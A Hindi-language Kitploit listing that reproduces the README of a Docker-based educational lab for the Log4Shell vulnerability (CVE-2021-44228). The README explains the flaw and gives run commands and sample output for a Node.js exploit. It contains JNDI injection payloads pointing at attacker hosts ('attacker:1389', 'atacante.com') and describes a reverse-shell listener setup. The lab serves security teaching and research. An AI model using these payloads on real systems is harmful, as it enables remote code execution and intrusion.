Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
EXPLOIT-CVE-2021-44228 — लॉग4शेल (CVE-2021-44228) RCE शोषण का प्रदर्शन करने वाली एक कमजोर Java एप्लिकेशन, LDAP रीडायरेक्टर और स्वचालित शोषण स्क्रिप्ट के साथ डॉकर-आधारित शैक्षिक प्रयोगशाला। | Kitploit
उपकरण/GitHubGitHub/joaovicdev/exploit-cve-2021-44228
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubjoaovicdev/exploit-cve-2021-44228

EXPLOIT-CVE-2021-44228

लॉग4शेल (CVE-2021-44228) RCE शोषण का प्रदर्शन करने वाली एक कमजोर Java एप्लिकेशन, LDAP रीडायरेक्टर और स्वचालित शोषण स्क्रिप्ट के साथ डॉकर-आधारित शैक्षिक प्रयोगशाला।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
45 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2021-44228 — Log4Shell PoC Lab

अस्वीकरण

यह प्रयोगशाला विशेष रूप से शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए बनाई गई है। सभी ट्रैफ़िक एक पृथक Docker नेटवर्क के भीतर होता है। इस सामग्री का उपयोग वास्तविक सिस्टम या स्पष्ट अनुमति के बिना न करें। दुरुपयोग अपराध हो सकता है। जिम्मेदारी से उपयोग करें।


CVE-2021-44228 क्या है?

Log4Shell एक गंभीर भेद्यता (CVSS 10.0) है जो दिसंबर 2021 में Apache Log4j 2 लॉगिंग लाइब्रेरी में खोजी गई थी, जो Java अनुप्रयोगों में व्यापक रूप से उपयोग की जाती है।

भेद्यता कैसे होती है

Log4j में अभिव्यक्ति इंटरपोलेशन सुविधा है: किसी संदेश को लॉग करते समय, यह ${...} प्रारूप में स्ट्रिंग का मूल्यांकन करता है। उदाहरण के लिए, ${java:version} रनटाइम पर Java संस्करण द्वारा प्रतिस्थापित किया जाता है।

समस्या JNDI (Java Naming and Directory Interface) प्रोटोकॉल के समर्थन में है। जब Log4j को इस तरह की अभिव्यक्ति मिलती है:

root@kitploit:~
${jndi:ldap://atacante.com/exploit}

यह JVM को हमलावर के सर्वर पर LDAP क्वेरी करने का निर्देश देता है। सर्वर एक दूरस्थ Java वर्ग के संदर्भ के साथ उत्तर देता है — और JVM उस वर्ग को करता है, जिसके परिणामस्वरूप होता है।

डाउनलोड और निष्पादित
Remote Code Execution (RCE)

हमले का वेक्टर सरल है: कोई भी फ़ील्ड जो सर्वर द्वारा लॉग की जाती है (HTTP headers, फॉर्म फ़ील्ड, कुकीज़, आदि) पेलोड का प्रवेश बिंदु हो सकती है।

प्रभावित संस्करण

  • Log4j 2.0-beta9 से 2.14.1
  • संस्करण 2.15.0 में ठीक किया गया (और निश्चित रूप से 2.17.0 में)

भेद्य वातावरण

लैब भेद्य संस्करणों का उपयोग करके एक वास्तविक Java अनुप्रयोग का अनुकरण करता है।

घटकसंस्करणयह भेद्य क्यों है
Apache Log4j2.14.1बिना किसी प्रतिबंध के ${jndi:...} का मूल्यांकन करता है
JDK1.8.0_181पैच 8u191 से पहले जो trustURLCodebase=false सेट करता है
Spring Boot2.5.6केवल वेब फ्रेमवर्क; भेद्यता Log4j की है

भेद्य एंडपॉइंट

root@kitploit:~
GET http://localhost:8080/log

निम्नलिखित हेडर सीधे Log4j द्वारा लॉग किए जाते हैं — उनमें से कोई भी इंजेक्शन वेक्टर हो सकता है:

  • X-Api-Version
  • User-Agent
  • X-Auth-Token

हमलावर का बुनियादी ढांचा (कंटेनर attacker)

सेवापोर्टकार्य
marshalsec (LDAP)1389JNDI lookup प्राप्त करता है और HTTP सर्वर पर रीडायरेक्ट करता है
Python HTTP सर्वर8888पीड़ित की JVM के लिए Exploit.class परोसता है
netcat listener9001रिवर्स शेल कनेक्शन प्राप्त करता है

एक्सप्लॉइट का उपयोग कैसे करें

पूर्वापेक्षाएँ

  • Docker और Docker Compose स्थापित
  • Node.js स्थापित (एक्सप्लॉइट के लिए)

1. पूरा वातावरण चालू करें

root@kitploit:~
docker-compose up --build

तब तक प्रतीक्षा करें जब तक आप लॉग में न देखें:

root@kitploit:~
[*] Waiting for reverse shell on :9001 ...
Started Application in X seconds

2. एक्सप्लॉइट चलाएँ

दूसरे टर्मिनल में, Node.js एक्सप्लॉइट चलाएँ:

root@kitploit:~
node exploit/exploit.js

अपेक्षित आउटपुट:

root@kitploit:~
[*] CVE-2021-44228 — Log4Shell PoC
[*] Target  : http://localhost:8080/log
[*] Header  : X-Api-Version
[*] Payload : ${jndi:ldap://attacker:1389/Exploit}

[+] Response : 200 OK
[+] Body     : logged

[+] Payload delivered — check the attacker nc listener on port 9001

3. निष्पादन सत्यापित करें

उस टर्मिनल का निरीक्षण करें जहाँ docker-compose चल रहा है। attacker कंटेनर के लॉग में आप पोर्ट 9001 पर रिवर्स शेल कनेक्शन आता देखेंगे।

भेद्य ऐप के अंदर touch /tmp/pwned की पुष्टि करने के लिए:

root@kitploit:~
docker exec -it log4j-cve-2021-44228-vulnerable-app-1 ls /tmp/pwned

कस्टम आर्गुमेंट्स (वैकल्पिक)

root@kitploit:~
# node exploit/exploit.js [target] [ldapHost] [ldapPort] [className] [header]
node exploit/exploit.js http://localhost:8080/log attacker 1389 Exploit "User-Agent"

द्वारा Guaxinim | साइबर सुरक्षा अनुसंधान

टूल डाउनलोड करें